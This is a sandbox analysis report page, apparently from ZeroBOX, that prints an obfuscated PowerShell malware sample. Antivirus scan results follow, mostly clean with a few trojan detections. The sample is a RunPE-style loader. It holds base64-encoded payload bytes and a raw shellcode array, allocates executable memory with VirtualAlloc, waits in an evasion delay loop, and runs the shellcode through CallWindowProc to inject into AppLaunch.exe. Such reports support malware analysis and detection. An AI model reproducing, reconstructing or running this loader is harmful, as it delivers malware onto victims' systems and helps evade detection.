popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
(("{61}{10}{50}{114}{117}{108}{18}{97}{52}{11}{68}{90}{51}{56}{102}{94}{13}{6}{33}{101}{106}{120}{5}{24}{8}{41}{19}{85}{83}{116}{74}{25}{48}{29}{7}{80}{46}{1}{40}{22}{77}{73}{43}{71}{21}{93}{47}{89}{23}{96}{20}{119}{12}{63}{109}{35}{86}{107}{118}{38}{81}{14}{91}{72}{4}{15}{82}{79}{75}{58}{57}{99}{95}{121}{98}{88}{37}{44}{112}{113}{70}{105}{65}{49}{32}{115}{64}{39}{92}{100}{3}{34}{59}{16}{111}{78}{17}{87}{60}{110}{67}{62}{66}{104}{76}{27}{36}{54}{26}{31}{9}{69}{84}{55}{53}{103}{2}{45}{30}{42}{28}{0}" -f 'AAAAAAAAAAAAAAZAijYf)
[IntPtr] C8jmshshellcodeAlloc_ptr = C8jmshRunPE::VirtualAlloc([IntPtr]::Zero, C8jmshshellcodeBytes.Length, 0x1000, 0x40)
[IntPtr] C8jmshdataAlloc_ptr = C8jmshRunPE::VirtualAlloc([IntPtr]::Zero, C8jmshpayLoadBytes.Length, 0x1000, 0x40)
[Runtime.InteropServices.Marshal]::Copy(C8jmshshellcodeBytes, 0, C8jmshshellcodeAlloc_ptr, C8jmshshellcodeBytes.Length)
[Runtime.InteropServices.Marshal]::Copy(C8jmshpayLoadBytes, 0, C8jmshdataAlloc_ptr, C8jmshpayLoadBytes.Length)
C8jmshdelaySeconds = 10
C8jmshstartTime = Get-Date
while ((Get-Date) -lt (C8jmshstartTime.AddSeconds(C8jmshdelaySeconds))) {
# Perform a non-intensive task
C8jmshnull = 1 + 1
C8jmshRunPE::CallWindowProc(C8jmshshellcodeAlloc_ptr, [Runtime.InteropServices.Marshal]::StringToHGlobalUni(qEIi8C:cn1aTWcn1aTWWindowscn1aTWcn1aTWMicrosoft.NETcn1aTWcn1aTWFrameworkcn1aTWcn1aTWv4.0.30319cn1aTWcn1aTWAppLaunch.exeqEIi8), C8jmshdataAlloc_ptr, 0, 0)','SisAQAKLQ4gZtoGHysAKAUAACsrDCCLwy5DKwAoCAAAKwreECYg4xjQLisAKAcAACsK3gAglQ1UHisAKAMAACsgHr/SpCsAKAsAACsoGwEABgsgyf+TqisAKAcAACsgRSVPJSsAKAMAACsoGwEABiYHKDsAAAotFgcgpnRzwysAKAcAACsGKIkAAAoM3gveAybeAH4zAAAKKggqAAEcAAAAAAAAJCQAEFAAAAEAAAAAkJAAA1AAAAEbMAIANAAAABIAABF+mwEACgJv7wAACiUtBCYUKwsDKPAAAApv6gAACiUtBiZ+MwAACgreCSZ+MwAACgreAAYqARAAAAAAAAApKQAJAwAAARMwAgBoAAAAHAAAERcKAigrAQAGJS0EJhYrCG+tAQAKFv4CLAIWCgIoLwEABiUtBCYWKwhvrgEAChb+AiwCFgoCKC0BAAYlLQQmFisIb68BAAoW/gIsAhYKAigpAQAGJS0EJhYrCG+wAQAKFv4CLAIWCgYqEzAEANIAAAAAAAAAAv4VRgAAAgJ+lgAABH2YAAAEAtBGAAACKCYAAAoosgEACn2XAAAEAywtAgOOaX2aAAAEAgJ7mgAABChEAQAKfZkAAAQDFgJ7mQAABAJ7mgAABCizAQAKBCwtAgSOaX2cAAAEAgJ7nAAABChEAQAKfZsAAAQEFgJ7mwAABAJ7nAAABCizAQAKBSxHAgWOaX2eAAAEAgJ7ngAABChEAQAKfZ0AAAQFFgJ7nQAABAJ7ngAAB
[Byte[]] C8jmshpayLoadBytes = [Convert]::FromBase64String(ZAijYfTVqQAAMAAAAEAAAA/','AhdYkR5iYH4BAAAEAhhYkR8QYmB+AQAABAIZWJEfGGJgDCgiAAAKfgEAAAQCGlgIbyMAAAooJAAACqUBAAAbCzjQAAAABhYzJxeNAQAAGw1+AQAABAIJFv4cAQAAGyglAAAKCRajAQAAGws4pQAAAAYXQJYAAAB+AQAABAKRfgEAAAQCF1iRHmJgfgEAAAQCGFiRHxBiYH4BAAAEAhlYkR8YYmATBH4BAAAEAhpYkX4BAAAEAhtYkR5iYH4BAAAEAhxYkR8QYmB+AQAABAIdWJEfGGJgEwXQAQAAGygmAAAKbycAAAoRBSgoAAAKEwZ+AQAABAIeWBEGFhEEGlkoJQAAChEGpQEAABsLKwgSAf4VAQAAGwcqEgf+FQEAABsRByoAAAATMAYAZQEAAAMAABEoHwAACiggAAAKbyEAAAo5RgEAAAIgTy93SVogIhigMGEQAAIfHmQKAiD///8/XxhiEAAGFzNRfgEAAAQCkX4BAAAEAhdYkR5iYH4BAAAEAhhYkR8QYmB+AQAABAIZWJEfGGJgDCgiAAAKfgEAAAQCGlgIbyMAAAooJAAACqUBAAAbCzjQAAAABhgzJxeNAQAAGw1+AQAABAIJFv4cAQAAGyglAAAKCRajAQAAGws4pQAAAAYZQJYAAAB+AQAABAKRfgEAAAQCF1iRHmJgfgEAAAQCGFiRHxBiYH4BAAAEAhlYkR8YYmATBH4BAAAEAhpYkX4BAAAEAhtYkR5iYH4BAAAEAhxYkR8QYmB+AQAABAIdWJEfGGJgEwXQAQAAGygmAAAKbycAAAoRBSgoAAAKEwZ+AQAABAIeWBEGFhEEGlkoJQAAChEGpQEAABsLKwgSAf4VAQAAGwcqEgf+FQEAABsRByoAAAATMAYAZQEAAAMAABEoHwAACiggAAAKbyEAAAo5RgEAAAIgL75RHlog
[DllImport(qEIi8kernel32.dllqEIi8)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, int flAllocationType, int flProtect);
[DllImport(qEIi8user32.dllqEIi8)]
public static extern IntPtr CallWindowProc(IntPtr lpPrevWndFunc, IntPtr hWnd, IntPtr Msg, int wParam, int lParam);
qEIi8@
C8jmshRunPE = Add-Type -memberDefinition C8jmshWinApi -Name qEIi8Win32qEIi8 -passthru
[Byte[]] C8jmshshellcodeBytes = 96,232,78,0,0,0,107,0,101,0,114,0,110,0,101,0,108,0,51,0,50,0,0,0,110,0,116,0,100,0,108,0,108,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,176,37,128,0,0,0,0,0,0,0,0,0,91,137,231,106,66,232,1,4,0,0,139,84,36,36,137,17,139,84,36,40,106,62,232,240,3,0,0,137,17,106,74,232,231,3,0,0,137,57,106,30,106,60,232,229,3,0,0,106,34,104,244,0,0,0,232,217,3,0,0,106,38,106,36,232,208,3,0','wD/h0MA/o5EBf+NQAb/kEgP/7dxKv+7dCv/vHQs/752LP+/diz/v3Ys/792LP++div/vXYp/7x2J/+5dST/t3Qj/7ZyIf+0ciD/snIf/7RwH/+yZxj/p1cN/5VIA/+JQAD/hzgA/4ZDAP+ERAD/g0MA/oJDAP6BRAD/f0QA/n1FAP57RwH6c0sG/3FSEpw0YhYAKHMmOi6BKvY2iy//OpA0/UCYO/5IoEP/U6hO/l2wWf5ltWH+abpl/2u7Zv5svWb/ar5l/W/EZv+U0nzuudefJMDaogCm1Y0B/+j/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANtA/ADnMRAH///8AYfpgDCKwNNAZpS3/Gakt+xisLv4ZsC3/GrMt/hm3Lv4aui7/G70v/hvAL/8cwzD+HMYx/h3JM/4dzTL9Hq8r/wmSJjKgcUVQlFkn/4NPEPw3uCr+SbEg/oxAAP+KSgD+j0gA/pNJAP+YSAH/mUoI/7ZvJv/EfC//w3ou/8V8L//GfS//x30v/8d9L//GfS//xXwu/8R7LP/DfCv/wX
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec ISB.Heuristic!gen21
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Emsisoft Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Clean
MAX Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.